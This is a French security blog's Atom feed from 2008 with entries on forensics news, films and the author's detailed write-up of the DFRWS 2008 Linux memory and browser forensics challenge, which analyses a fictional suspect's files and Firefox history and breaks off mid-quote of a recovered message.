<?xml version="1.0" encoding="UTF-8" ?>
<feed xmlns="http://purl.org/atom/ns#" version="0.3"
	  xmlns:dc="http://purl.org/dc/elements/1.1/"
	  xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	  xml:lang="fr">

  <title>devloop :: blog</title>
  <link rel="alternate" type="text/html" href="http://devloop.lyua.org/blog/index.php"/>
  <tagline type="text/plain" mode="escaped">Blog sur la sécurité informatique, Linux et le Web</tagline>
  
  <modified>2008-07-19T16:59:49+00:00</modified>
  <generator version="1.2" url="http://www.dotclear.net/">DotClear</generator>
  
  <sy:updatePeriod>daily</sy:updatePeriod>
  <sy:updateFrequency>1</sy:updateFrequency>
  <sy:updateBase>2008-07-19T16:59:49+00:00</sy:updateBase>
  
<entry xml:lang="fr">
  <title>Un air de ressemblance</title>
  <link rel="alternate" type="text/html" href="http://devloop.lyua.org/blog/index.php?2008/07/19/520-un-air-de-ressemblance" />
  <issued>2008-07-19T16:59:49+00:00</issued>
  <modified>2008-07-19T16:59:49+00:00</modified>
  <id>http://devloop.lyua.org/blog/index.php?2008/07/19/520-un-air-de-ressemblance</id>
  <author><name>devloop</name></author>
  <dc:subject>Divers</dc:subject>
  <summary>C'est complétement par hazard que je suis tombé sur une image où je retrouvais le logo de présent blog. A l'origine j'avais trouvé le smiley seul sur un autre site avant de le réutiliser, mais...</summary>
  <content type="text/html" mode="escaped"> C'est complétement par hazard que je suis tombé sur une image où je retrouvais le logo de présent blog. A l'origine j'avais trouvé le smiley &lt;q&gt;seul&lt;/q&gt; sur un autre site avant de le réutiliser, mais sur cette nouvelle image il était accompagné...&lt;br /&gt;
Après un bon temps passé sur &lt;em&gt;Google&lt;/em&gt; et &lt;em&gt;Yahoo!&lt;/em&gt;, j'ai finalement retrouvé &lt;a href=&quot;http://dragonkahn.deviantart.com/art/Today-597304&quot; hreflang=&quot;en&quot;&gt;l'image et l'auteur original&lt;/a&gt;. Il s'agissait d'un sympathique wallpaper :) &lt;br /&gt;&lt;br /&gt;
J'en profite pour faire un petit screenshot de mon environnement actuel (ça faisait longtemps) : &lt;em&gt;KDE4&lt;/em&gt; avec le thème &lt;em&gt;Aya&lt;/em&gt; et un Widget qui m'affiche les strips de &lt;em&gt;User-Friendly&lt;/em&gt;.&lt;br /&gt;

&lt;a href=&quot;http://img501.imageshack.us/img501/9827/screenshotni2.png&quot;&gt;&lt;img src=&quot;http://img501.imageshack.us/img501/9827/screenshotni2.th.png&quot; alt=&quot;devloop screenshot&quot; /&gt;&lt;/a&gt;</content>
</entry>
<entry xml:lang="fr">
  <title>Inforensique en vrac</title>
  <link rel="alternate" type="text/html" href="http://devloop.lyua.org/blog/index.php?2008/07/19/519-inforensique-en-vrac" />
  <issued>2008-07-19T16:40:58+00:00</issued>
  <modified>2008-07-19T16:40:58+00:00</modified>
  <id>http://devloop.lyua.org/blog/index.php?2008/07/19/519-inforensique-en-vrac</id>
  <author><name>devloop</name></author>
  <dc:subject>Sécurité Informatique</dc:subject>
  <summary>C'est la classe : ma solution du challenge DFRWS 2008 a été citée sur le Computer Forensic Blog.
Mais ce n'est rien comparé au travail des développeurs de Volatility sur l'analyse de la mémoire...</summary>
  <content type="text/html" mode="escaped"> C'est la classe : &lt;a href=&quot;http://devloop.lyua.org/blog/index.php?2008/07/12/517-ma-solution-du-challenge-dfrws-2008&quot; hreflang=&quot;fr&quot;&gt;ma solution du challenge DFRWS 2008&lt;/a&gt; a été &lt;a href=&quot;http://computer.forensikblog.de/en/2008/07/linux_memory_analysis_2.html&quot; hreflang=&quot;en&quot; target=&quot;_blank&quot;&gt;citée sur le &lt;em&gt;Computer Forensic Blog&lt;/em&gt;&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;
Mais ce n'est rien comparé &lt;a href=&quot;http://volatilesystems.blogspot.com/2008/07/linux-memory-analysis-one-of-major.html&quot; hreflang=&quot;en&quot; target=&quot;_blank&quot;&gt;au travail des développeurs de &lt;em&gt;Volatility&lt;/em&gt;&lt;/a&gt; sur l'analyse de la mémoire des systèmes &lt;em&gt;Linux&lt;/em&gt;.&lt;br /&gt;
Ils ont apporté des modifications à un outil de &lt;em&gt;RedHat&lt;/em&gt; nommé &lt;a href=&quot;http://people.redhat.com/anderson/&quot; hreflang=&quot;en&quot; target=&quot;_blank&quot;&gt;&lt;em&gt;Crash&lt;/em&gt;&lt;/a&gt; qui permet ainsi d'extraire de l'image de la mémoire la liste des processus, fichiers ouverts, connexions en cours, points de montages utilisés et bien plus encore.&lt;br /&gt;&lt;br /&gt;
Ils ont ensuite amélioré &lt;a href=&quot;https://www.volatilesystems.com/default/volatility&quot; hreflang=&quot;en&quot; target=&quot;_blank&quot;&gt;&lt;em&gt;Volatility&lt;/em&gt;&lt;/a&gt; pour qu'il gère les images de mémoire physique &lt;em&gt;Linux&lt;/em&gt;.&lt;br /&gt;
On retrouve les fonctionnalités qui ont été ajoutées à &lt;em&gt;Crash&lt;/em&gt; ainsi que des possibilités supplémentaires pour extraire certains éléments de la mémoire : mémoire d'un processus particulier, paquets réseau...&lt;br /&gt;
Cela leur a par exemple permis de retrouver la communication FTP que je n'ai pas trouvé durant ma recherche :) &lt;br /&gt;
&lt;br /&gt;
&lt;em&gt;Volatility&lt;/em&gt; peut aussi être utilisé comme module dans &lt;a href=&quot;http://www.pyflag.net/&quot; hreflang=&quot;en&quot; target=&quot;_blank&quot;&gt;&lt;em&gt;PyFlag&lt;/em&gt;&lt;/a&gt; et au vue des captures d'écran ça a l'air impressionant ^_^ &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Changeons de sujet avec &lt;a href=&quot;http://www.darkreading.com/document.asp?doc_id=159192&amp;amp;WT.svl=news1_2&quot; hreflang=&quot;fr&quot; target=&quot;_blank&quot;&gt;cet article de Dark Reading&lt;/a&gt; qui nous apprend que &lt;em&gt;Bruce Schneier&lt;/em&gt; et un groupe de chercheurs auraient réussi à détecter la présence des systèmes de fichiers cachés par &lt;em&gt;TrueCrypt&lt;/em&gt;.&lt;br /&gt;
Je m'attendais à lire des révélations croustillantes sur un oubli d'implémentation ou une faiblesse cryptographique, en réalité ils se sont seulement basés sur les traces d'accès laissés sur un système &lt;em&gt;Windows&lt;/em&gt; qui montraient l'existence de fichiers sur une partition qui n'apparait pas dans la table des partitions.&lt;br /&gt;
Ils se sont notamment basés sur l'analyse des fichiers .lnk et des listes MRU (&lt;em&gt;Most Recently Used&lt;/em&gt;) présentes dans le registre de &lt;em&gt;Windows&lt;/em&gt;.&lt;br /&gt;
&lt;br /&gt;
Je trouve que l'équation&lt;br /&gt;
&lt;em&gt;présence des exécutables TrueCrypt + preuve de l'existence d'une partition qui n'y est plus = preuve de l'existence d'une partition cachée&lt;/em&gt;&lt;br /&gt;
est un peu rapide et est loin d'être fiable.&lt;br /&gt;
C'est ce que j'ai tendance à appeler le &lt;q&gt;principe de l'entourloupe&lt;/q&gt;, à savoir bien que ces outils soient utiles, leur simple présence génère la suspicion chez la personne qui analyse le système. C'est pour cela que je regarde toujours avec un peu de recul le principe du &lt;a href=&quot;http://fr.wikipedia.org/wiki/Déni_plausible&quot; hreflang=&quot;fr&quot; target=&quot;_blank&quot;&gt;déni plausible&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
C'est en particulier vrai avec des outils spécialisés comme &lt;a href=&quot;http://devloop.lyua.org/blog/index.php?2006/09/22/323-deux-logiciels-de-cryptographie&quot; hreflang=&quot;fr&quot;&gt;Stegeek&lt;/a&gt;, 2c2, 4C ou encore &lt;a href=&quot;http://phrack.org/issues.html?issue=65&amp;amp;id=6#article&quot; hreflang=&quot;en&quot; target=&quot;_blank&quot;&gt;Elettra&lt;/a&gt; paru dans le dernier &lt;em&gt;Phrack&lt;/em&gt;.&lt;br /&gt;
Ca me parait moins vrai pour les partitions cachées, surtout que la technique utilisée dans l'article n'est pas liée à &lt;em&gt;TrueCrypt&lt;/em&gt; et pourrait même déjouer une &lt;a href=&quot;http://devloop.lyua.org/blog/index.php?2007/11/17/485-creez-une-partition-cachee-sous-linux&quot; hreflang=&quot;fr&quot;&gt;méthode faite maison&lt;/a&gt;. Bref la faille n'est pas dans &lt;em&gt;TrueCrypt&lt;/em&gt; mais plus du côté de l'utilisateur qui devrait prendre &lt;a href=&quot;http://support.microsoft.com/kb/142298&quot; hreflang=&quot;fr&quot; target=&quot;_blank&quot;&gt;différentes mesures&lt;/a&gt; pour dissimuler son activité (et s'il utilise &lt;em&gt;TrueCrypt&lt;/em&gt; il doit bien être capable de le faire :p )</content>
</entry>
<entry xml:lang="fr">
  <title>Cinéma en vrac</title>
  <link rel="alternate" type="text/html" href="http://devloop.lyua.org/blog/index.php?2008/07/19/518-cinema-en-vrac" />
  <issued>2008-07-19T15:28:22+00:00</issued>
  <modified>2008-07-19T15:28:22+00:00</modified>
  <id>http://devloop.lyua.org/blog/index.php?2008/07/19/518-cinema-en-vrac</id>
  <author><name>devloop</name></author>
  <dc:subject>Cinéma</dc:subject>
  <summary>The Dark Knight est sorti hier (18 juillet) aux U.S.A. et comme prévu, le premier teaser de Terminator Renaissance (titre original : Terminator Salvation) a fait son apparition.
La vidéo étant...</summary>
  <content type="text/html" mode="escaped"> &lt;a href=&quot;http://www.allocine.fr/film/fichefilm_gen_cfilm=115362.html&quot; hreflang=&quot;fr&quot; target=&quot;_blank&quot;&gt;&lt;em&gt;The Dark Knight&lt;/em&gt;&lt;/a&gt; est sorti hier (18 juillet) aux U.S.A. et comme prévu, &lt;a href=&quot;http://www.allocine.fr/video/player_gen_cmedia=18823821&amp;amp;cfilm=57405&amp;amp;hd=1.html&quot; hreflang=&quot;fr&quot; target=&quot;_blank&quot;&gt;le premier teaser de &lt;em&gt;Terminator Renaissance&lt;/em&gt;&lt;/a&gt; (titre original : &lt;em&gt;Terminator Salvation&lt;/em&gt;) a fait son apparition.&lt;br /&gt;
La vidéo étant volontairement saccadée et pleine d'interférences, on n'en apprenda pour le moment pas plus sur le film. Les décors et l'ambiance apocalyptiques donnent toutefois le ton général du film :) &lt;br /&gt;
La nouvelle concernant ce quatrième épisode est &lt;a href=&quot;http://www.allocine.fr/article/fichearticle_gen_carticle=18424587.html&quot; hreflang=&quot;fr&quot; target=&quot;_blank&quot;&gt;l'arrivée de &lt;em&gt;Helena Bonham Carter&lt;/em&gt;&lt;/a&gt; dans le film &lt;a href=&quot;http://www.imdb.com/title/tt0438488/&quot; hreflang=&quot;en&quot;&gt;qui jouera le rôle d'une certaine &lt;q&gt;Serena&lt;/q&gt;&lt;/a&gt;, personnage inconnue au bataillon. Les rumeurs vont bon train, pour certains elle jouera le rôle d'une méchante, voir même incarnera une &lt;q&gt;terminatrice&lt;/q&gt; :) &lt;br /&gt;
&lt;br /&gt;
Et pour découvrir tout ce que vous vouliez savoir sur Terminator, vous pouvez vous rendre sur &lt;a href=&quot;http://terminator.wikia.com/wiki/Terminator_Wiki&quot; hreflang=&quot;en&quot; target=&quot;_blank&quot;&gt;l'encyclopédie dédiée sur Wikia&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;http://www.imdb.com/title/tt0865957/&quot; hreflang=&quot;en&quot; target=&quot;_blank&quot;&gt;Wargames: The Dead Code&lt;/a&gt;, reprend le principe du premier &lt;em&gt;Wargames&lt;/em&gt; (avec &lt;em&gt;Matthew Broderick&lt;/em&gt;).&lt;br /&gt;
Le film sortira le 29 juillet aux U.S.A., aucune date n'est communiquée pour une éventuelle sortie en France.&lt;br /&gt;
Pour le moment on a déjà droit à &lt;a href=&quot;http://youtube.com/watch?v=SP4672dSp3o&quot; hreflang=&quot;en&quot; target=&quot;_blank&quot;&gt;un premier trailer&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Il va y avoir (encore) une adaptation d'un vieux comic américain nommé &lt;q&gt;Watchmen&lt;/q&gt;. Je ne connais pas l'original, on verra bien &lt;a href=&quot;http://www.allocine.fr/film/fichefilm_gen_cfilm=57769.html&quot; hreflang=&quot;fr&quot; target=&quot;_blank&quot;&gt;ce que ça donne&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Sinon une satire des films de vampires va sortir en salles le 6 aout. C'est français et ça s'appelle &lt;a href=&quot;http://www.allocine.fr/film/fichefilm_gen_cfilm=126903.html&quot; hreflang=&quot;fr&quot; target=&quot;_blank&quot;&gt;Les Dents de la nuit&lt;/a&gt;. On y retrouve pas mal de beau monde comme &lt;em&gt;Patrick Mille&lt;/em&gt; (&lt;em&gt;99F&lt;/em&gt;), &lt;em&gt;Frédérique Bel&lt;/em&gt; (la &lt;em&gt;Minute Blonde&lt;/em&gt;), &lt;em&gt;Vincent Desagnat&lt;/em&gt; (collègue de &lt;em&gt;Michaël Youn&lt;/em&gt;), &lt;em&gt;Hélène de Fougerolles&lt;/em&gt; et &lt;em&gt;Tchéky Karyo&lt;/em&gt;.&lt;br /&gt;
Il n'y a plus qu'à espérer que ce soit drôle :D</content>
</entry>
<entry xml:lang="fr">
  <title>Ma solution du challenge DFRWS 2008</title>
  <link rel="alternate" type="text/html" href="http://devloop.lyua.org/blog/index.php?2008/07/12/517-ma-solution-du-challenge-dfrws-2008" />
  <issued>2008-07-12T21:50:04+00:00</issued>
  <modified>2008-07-12T21:50:04+00:00</modified>
  <id>http://devloop.lyua.org/blog/index.php?2008/07/12/517-ma-solution-du-challenge-dfrws-2008</id>
  <author><name>devloop</name></author>
  <dc:subject>Sécurité Informatique</dc:subject>
  <summary>Introduction

Le Digital Forensic Research Workshop (DFRWS) est une organisation qui cherche à faire évoluer les recherches en inforensique, cela notamment par l'organisation d'un concours...</summary>
  <content type="text/html" mode="escaped"> &lt;strong&gt;Introduction&lt;/strong&gt;&lt;br /&gt;
&lt;br /&gt;
Le &lt;em&gt;Digital Forensic Research Workshop&lt;/em&gt; (&lt;em&gt;DFRWS&lt;/em&gt;) est une organisation qui cherche à faire évoluer les recherches en &lt;a href=&quot;http://fr.wikipedia.org/wiki/Inforensique&quot; hreflang=&quot;fr&quot; target=&quot;_blank&quot;&gt;inforensique&lt;/a&gt;, cela notamment par l'organisation d'un concours organisé chaque année depuis 2001.&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;http://www.dfrws.org/2008/challenge/submission.shtml&quot; hreflang=&quot;en&quot; target=&quot;_blank&quot;&gt;Le challenge de cette année 2008&lt;/a&gt; est ouvert depuis début mai mais comme j'en ai eu vent que récemment, j'ai commencé mon analyse seulement 3 jours avant la fermeture du challenge. Ce qui n'est pas bien grave puisque le challenge s'adresse principalement aux citoyens des Etats-Unis et je ne pensais pas le faire &lt;q&gt;officiellement&lt;/q&gt;.&lt;br /&gt;
&lt;br /&gt;
Je comptais poster mon analyse en fin d'après-midi mais force et de constater que je n'ai pas eu le temps et que les derniers &lt;q&gt;détails&lt;/q&gt; que je voulait régler étaient plus prenant que je ne le pensais :p &lt;br /&gt;
&lt;br /&gt;
L'objectif des organisateurs pour cette année 2008 est de faire avancer les méthodes d'analyse de la mémoire RAM des systèmes GNU/Linux. C'est pour cette raison que les données offertes pour l'analyse sont une image de la mémoire d'un système mais aussi un enregistrement de communications réseau (fichier pcap) et une copie des fichiers présents dans le répertoire personnel du suspect.&lt;br /&gt;
A noter que pour le répertoire personnel il s'agit vraiment d'une &lt;q&gt;copie de fichiers&lt;/q&gt; et non de l'image d'une partition :( &lt;br /&gt;
&lt;br /&gt;
Je tiens à signaler que dans ma version de la solution vous ne trouverez pas de tools ou de techniques de-la-mort-qui-tue sur comment extraire la liste des processus depuis une image RAM ou obtenir la liste des fichiers qui étaient ouvert depuis cette même image.&lt;br /&gt;
Après quelques recherches, le sujet m'a paru trop complexe et j'ai privilégié une analyse plus &lt;q&gt;classique&lt;/q&gt;. Toutefois si le sujet vous intéresse vous pouvez vous plonger dans une thèse de 2006 réalisée par des étudiants de la &lt;q&gt;Naval Postgraduate School&lt;/q&gt;de &lt;em&gt;Monterey&lt;/em&gt; (&lt;em&gt;Californie&lt;/em&gt;) et baptisée &lt;a href=&quot;http://cisr.nps.edu/downloads/theses/06thesis_urrea.pdf&quot; hreflang=&quot;en&quot;&gt;An analysis of Linux RAM forensics&lt;/a&gt; ou le document &lt;a href=&quot;http://www.e-fense.com/helix/Docs/forensics-physical-memory.pdf&quot; hreflang=&quot;en&quot;&gt;Digital forensics of the physical memory&lt;/a&gt; de &lt;em&gt;Maruisz Burdach&lt;/em&gt; et daté de 2005.&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;Le scénario&lt;/strong&gt;&lt;br /&gt;
&lt;br /&gt;
Votre entreprise est la cible de vol d'information. Une enquête a été faite avec surveillance réseau en parallèle qui a permis de souligner le comportement suspect d'un employé.&lt;br /&gt;
L'équipe sécurité de la boite a récupéré différentes données que vous devez analyser pour déterminer qu'elles ont été les activités récentes de cet utilisateur.&lt;br /&gt;
&lt;br /&gt;
Votre entreprise souhaiterait avoir des réponses aux interrogations suivantes :&lt;br /&gt;
&lt;ul&gt;
 &lt;li&gt;Quelle activité de l'utilisateur peut être mis en évidence d'après les données ?&lt;/li&gt;
 &lt;li&gt;Est-ce qu'une activité suspecte peut-être décelée sur ce système ?&lt;/li&gt;
 &lt;li&gt;Il y a t'il des preuves de collaboration avec une personne extérieure ? Si oui de quelle façon ?&lt;/li&gt;
 &lt;li&gt;Est-ce que des données sensibles ont été volées ? Sinon peut-on en savoir plus sur la nature des données et la façon dont elles ont été transmises ?&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;strong&gt;Analyse des fichiers de l'utilisateur&lt;/strong&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;img src=&quot;http://xs329.xs.to/xs329/08286/computer-forensics-data-recovery672.jpg&quot; alt=&quot;digital forensics&quot; style=&quot;float: right; margin-left: 5px;&quot; /&gt;L'analyse des fichiers est sans doute la partie la moins intéressante du challenge. Principalement parce qu'il y a peut d'informations intéressantes. On devine facilement au nombres de dossiers présents que l'utilisateur n'utilisait pas le système depuis longtemps et n'a pas fouillé dans les configurations du système.&lt;br /&gt;
De plus on suspecte très vite l'utilisateur d'avoir fait un peu de ménage derrière lui. Notamment le dossier .Trash est manquant tout comme l'historique de bash.&lt;br /&gt;
&lt;br /&gt;
D'après les fichiers présents, on est en mesure de dire que l'utilisateur utilisait un window manager basé sur GTK, très certainement GNOME.&lt;br /&gt;
La présence du fichier &lt;em&gt;.gnome2/gedit-metadata.xml&lt;/em&gt; met en évidence l'utilisation de l'éditeur de texte Gedit. Ce fichier permet de garder en mémoire la position du curseur dans les fichiers qui ont été ouverts jusqu'à présent. Ainsi à la prochaine ouverture du fichier, le curseur est replacé à la ligne mémorisée la dernière fois.&lt;br /&gt;
Le contenu de ce fichier prouve l'édition des fichiers &lt;em&gt;.bash_history&lt;/em&gt;, &lt;em&gt;.bashrc&lt;/em&gt;, &lt;em&gt;.lesshst&lt;/em&gt; et enfin d'un fichier &lt;q&gt;ELF exploit.sh&lt;/q&gt; qui était présent dans un répertoire &lt;q&gt;temp&lt;/q&gt; qui n'existe plus.&lt;br /&gt;
L'autre historique intéressant est celui de &lt;a href=&quot;http://en.wikipedia.org/wiki/Midnight_Commander&quot; hreflang=&quot;en&quot; target=&quot;_blank&quot;&gt;Midnight Commander&lt;/a&gt; situé à l'emplacement &lt;em&gt;.mc/history&lt;/em&gt;.&lt;br /&gt;
On y voit le chemin du home de l'utilisateur (&lt;em&gt;/home/stevev&lt;/em&gt;) et aussi un point de montage sur &lt;em&gt;/mnt/hgfs/Admin_share&lt;/em&gt;.&lt;br /&gt;
Le dernier répertoire accédé est &lt;em&gt;/media/disk/DFRWS&lt;/em&gt;, à priori une preuve du passage de l'équipe de sécurité lors de la récupération des données.&lt;br /&gt;
&lt;br /&gt;
Un autre fichier nous permet de déterminer que le système utilisé est basé sur RedHat (du moins il utilise le gestionnaire de paquet &lt;em&gt;YUM&lt;/em&gt;)&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;Analyse du cache de Firefox&lt;/strong&gt;&lt;br /&gt;
&lt;br /&gt;
L'utilisateur n'ayant de toute évidence pas pensé à vider son historique de navigation web, son contenu devient une véritable mine d'or.&lt;br /&gt;
Tout d'abord, le fichier &lt;em&gt;cookies.txt&lt;/em&gt; nous permet d'avoir facilement une liste des sites qu'il a visité. Une fois que l'on retire les habituels sites d'ADS/trackers/publicité, il nous reste la liste suivante :&lt;br /&gt;
corporate.disney.go.com&lt;br /&gt;
disney.go.com&lt;br /&gt;
docs.google.com&lt;br /&gt;
forum.freeadvice.com&lt;br /&gt;
live.com&lt;br /&gt;
login.live.com&lt;br /&gt;
mail.google.com&lt;br /&gt;
noblebank.pl&lt;br /&gt;
spreadsheets.google.com&lt;br /&gt;
www.bankrate.com&lt;br /&gt;
www.derkeiler.com&lt;br /&gt;
www.google.com&lt;br /&gt;
www.msn.com&lt;br /&gt;
travelocity.com&lt;br /&gt;
&lt;br /&gt;
La grande majorité des sites visités sont pour le moins classique. Il y a seulement la présence de &lt;em&gt;derkeiler&lt;/em&gt; qui laisse suposer que l'employé s'intéresse à la sécurité informatique (ce site rassemble des mailing-lists sur le sujet).&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;Firefox : les fichiers formhistory.dat et history.dat&lt;/strong&gt;&lt;br /&gt;
&lt;br /&gt;
Ces deux fichiers sont écrits dans un format pour le moins étrange. Après quelques recherches on apprend que cette structure est du &lt;a href=&quot;http://en.wikipedia.org/wiki/Mork_(file_format)&quot; hreflang=&quot;en&quot; target=&quot;_blank&quot;&gt;Mork&lt;/a&gt;, un format de fichier pour le moins critiqué...&lt;br /&gt;
&lt;br /&gt;
Pour décoder ces deux fichiers j'ai testé différents logiciels gratuits et open-source comme &lt;a href=&quot;https://bugzilla.mozilla.org/attachment.cgi?id=175024&quot; target=&quot;_blank&quot;&gt;demork.py&lt;/a&gt; qui transforme les données en une version XML, &lt;a href=&quot;http://www.jwz.org/hacks/mork.pl&quot; target=&quot;_blank&quot;&gt;mork.pl&lt;/a&gt; qui présente les résultats très simplement sous la forme d'une liste et &lt;a href=&quot;http://www.medlir.com/code/fhdump.pl&quot; target=&quot;_blank&quot;&gt;fhdump.pl&lt;/a&gt; qui, si mes souvenirs sont bons, ne m'a rien renvoyé.&lt;br /&gt;
Mais je crois que mon préféré a été celui de &lt;em&gt;Foundstone&lt;/em&gt; baptisé &lt;a href=&quot;http://www.foundstone.com/us/resources/proddesc/DumpAutoComplete.htm&quot; hreflang=&quot;en&quot; target=&quot;_blank&quot;&gt;DumpAutoComplete&lt;/a&gt; et qui fonctionne sous Windows (exe) comme sous Linux (version Python) et donne un output XML plutôt sympathique.&lt;br /&gt;
&lt;br /&gt;
Le fichier &lt;em&gt;formhistory.dat&lt;/em&gt; stocke le texte que l'utilisateur a saisie dans des formulaires. On n'y retrouve toutefois pas de mot de passe, l'utilisateur n'ayant probablement pas activé cette fonctionnalité.&lt;br /&gt;
Une partie intéressante de ce fichier est celle qui conserve les recherches effectuées depuis le navigateur. Ces informations données par l'outil de &lt;em&gt;Foundstone&lt;/em&gt; se représentent ainsi :&lt;br /&gt;

&lt;pre&gt;&amp;lt;field name=&amp;quot;searchbar-history&amp;quot;&amp;gt;
  &amp;lt;saved&amp;gt;CAN-2005-1263&amp;lt;/saved&amp;gt;
  &amp;lt;saved&amp;gt;extradition costa rica&amp;lt;/saved&amp;gt;
  &amp;lt;saved&amp;gt;maldives&amp;lt;/saved&amp;gt;
  &amp;lt;saved&amp;gt;non-extradition countries&amp;lt;/saved&amp;gt;
  &amp;lt;saved&amp;gt;overseas credit card payments&amp;lt;/saved&amp;gt;
  &amp;lt;saved&amp;gt;panama extradition&amp;lt;/saved&amp;gt;
  &amp;lt;saved&amp;gt;private banking&amp;lt;/saved&amp;gt;
  &amp;lt;saved&amp;gt;privilege elevation 2.6.19&amp;lt;/saved&amp;gt;
&amp;lt;/field&amp;gt;&lt;/pre&gt;
Il semblerait que notre suspect ait envie de s'éclipser quelques temps dans une contrée où il ne risque rien et, si possible, au soleil voire dans des paradis fiscaux ^_^ &lt;br /&gt;
Il a aussi effectué une recherche sur des failles de sécurité du kernel qui pourrait lui permettre de passer root sur sa machine (ou une autre).&lt;br /&gt;
&lt;br /&gt;
Les autres informations saisies par formulaire nous apprenent que notre suspect se prénomme &lt;em&gt;Steve Vogon&lt;/em&gt;, qu'il a deux adresses mails qui sont &lt;em&gt;Steve.Vogon@gmail.com&lt;/em&gt; et &lt;em&gt;steve_vogon@hotmail.com&lt;/em&gt; et qu'il compte prendre un avion à destination du &lt;em&gt;Costa Rica&lt;/em&gt; avec une certaine &lt;em&gt;Catherine Lagrande&lt;/em&gt;.&lt;br /&gt;
&lt;em&gt;Steve&lt;/em&gt; est joignable au &lt;em&gt;202 555 9900&lt;/em&gt; toujours d'après le fichier &lt;em&gt;formhistory.dat&lt;/em&gt;.&lt;br /&gt;
Je tiens à préciser que je n'ai pas forcément obtenu ces informations dans le même ordre que l'article mais j'essaye de suivre un ordre logique pour expliquer :p &lt;br /&gt;
&lt;br /&gt;
Le fichier &lt;em&gt;history.dat&lt;/em&gt; rassemble, dans l'ordre, les urls que l'utilisateur a visité. Cela nous permet de comprendre mieux le cheminement suivi lors de ses recherches sur Internet et on pourrait ainsi créer une &lt;q&gt;timeline&lt;/q&gt; de son activité.&lt;br /&gt;
Je vous passe les détails de cette navigation, le principal à remarquer est que l'utilisateur est allé voir ses messages sur &lt;em&gt;GMail&lt;/em&gt; et &lt;em&gt;Windows Live&lt;/em&gt; et qu'il semble faire une utilisation assez soutenue de &lt;em&gt;Google Docs&lt;/em&gt; (l'ancien &lt;em&gt;Writely&lt;/em&gt;) et de &lt;em&gt;Google Spreadsheet&lt;/em&gt;. Des services de travail collaboratif en ligne.&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;Les mots de passe enregistrés par Firefox&lt;/strong&gt;&lt;br /&gt;
&lt;br /&gt;
Firefox utilise un système de chiffrement particulier. Les mots de passes sont stockés chiffrés dans le fichier &lt;em&gt;signons2.txt&lt;/em&gt;, protégés à l'aide d'un mot de passe maitre présent dans &lt;em&gt;key3.db&lt;/em&gt; (chiffré lui aussi à priori).&lt;br /&gt;
Les fichiers &lt;em&gt;cert8.db&lt;/em&gt; et &lt;em&gt;secmod.db&lt;/em&gt; entrent aussi en compte dans ce système.&lt;br /&gt;
&lt;a href=&quot;http://wejn.org/stuff/moz-export.html&quot; hreflang=&quot;en&quot; target=&quot;_blank&quot;&gt;Un outil en Ruby&lt;/a&gt; ainsi que &lt;a href=&quot;http://securityxploded.com/firepassword.php&quot; hreflang=&quot;en&quot; target=&quot;_blank&quot;&gt;FirePassword&lt;/a&gt; permettent d'extraire les informations de ces fichiers... mais il faut connaître le mot de passe maître, aussi je n'ai pas cherché plus loin.&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;Le cache de Firefox&lt;/strong&gt;&lt;br /&gt;
&lt;br /&gt;
En l'occurence présents dans &lt;em&gt;.mozilla/firefox/n5q6tfua.default/Cache&lt;/em&gt;, ces fichiers n'ont pas d'extensions et ont un nom composé de 11 caractères dans l'alphabet hexadécimal (de 0 à 9 et de A à F).&lt;br /&gt;
Le plus simple est encore de profiter de la force de Linux qui détermine le type des fichiers à partir de leur entête. Avec un simple gestionnaire de fichier comme &lt;em&gt;Dolphin&lt;/em&gt;, une visionneuse d'images comme &lt;em&gt;Gwenview&lt;/em&gt;, un éditeur de texte et un navigateur web, on peut analyser la quasi totalité des fichiers.&lt;br /&gt;
Restent les archives gzippées qui requièrent une étape supplémentaire de décompression et les fichiers _CACHE_00X_ générés par le navigateur.&lt;br /&gt;
Après avoir cherché sans succès un outil open-source fonctionnant sous Linux pour lire ces fichiers CACHE et m'être cassé la tête pour essayer de faire fonctionner un &lt;a href=&quot;http://forums.mozillazine.org/viewtopic.php?f=27&amp;amp;t=637514&quot; hreflang=&quot;en&quot; target=&quot;_blank&quot;&gt;script python&lt;/a&gt; pas au point, je m'en suis remis à &lt;a href=&quot;http://www.cgsecurity.org/wiki/PhotoRec_FR&quot; hreflang=&quot;fr&quot;&gt;PhotoRec&lt;/a&gt; qui s'est montré particulièrement efficace pour en extraire des fichiers (les fichiers _CACHE_XXX_ sont un peu comme des archives tar, le fichier _CACHE_MAP_ est la &lt;q&gt;carte&lt;/q&gt; disant à quel offset se trouve chaque fichier)&lt;br /&gt;
&lt;br /&gt;
Les images extraites permettaient de voir que le suspect est allé sur le site et le blog de &lt;a href=&quot;http://www.metasploit.com/&quot; hreflang=&quot;en&quot; target=&quot;_blank&quot;&gt;Projet Metasploit&lt;/a&gt; et différents sites de voyage.&lt;br /&gt;
&lt;img src=&quot;http://xs229.xs.to/xs229/08286/photo_sm_maldives241.jpg&quot; alt=&quot;Maldives&quot; /&gt;&lt;br /&gt;
&lt;br /&gt;
Dans le cache du navigateur on retrouve aussi énormément de code javascript ou CSS qui ont été chargés avec les pages. Concernant les connexions à &lt;em&gt;Google&lt;/em&gt; vous avez peut-être déjà remarqué que ce dernier se sert en grande quantité du format d'échange &lt;a href=&quot;http://en.wikipedia.org/wiki/JSON&quot; hreflang=&quot;en&quot;&gt;JSON&lt;/a&gt;. Le résultat c'est que les données qui nous intéressent ne se trouvent pas dans les pages HTML mises en cache mais dans des fichiers textes à part...&lt;br /&gt;
&lt;br /&gt;
Au final on en extrait la conversation suivante avec une certaine &lt;q&gt;Faa Tali&lt;/q&gt; :
&lt;pre&gt;Re: Negotiate (Google Docs)
I apologize for the delay -- I was required to travel recently.
I agree with your final terms and will contact you via the cell provided to discuss the transfer. I have received your software package and instructions for transfer.

On Dec 9, 2007 3:15 AM, faa tali wrote:
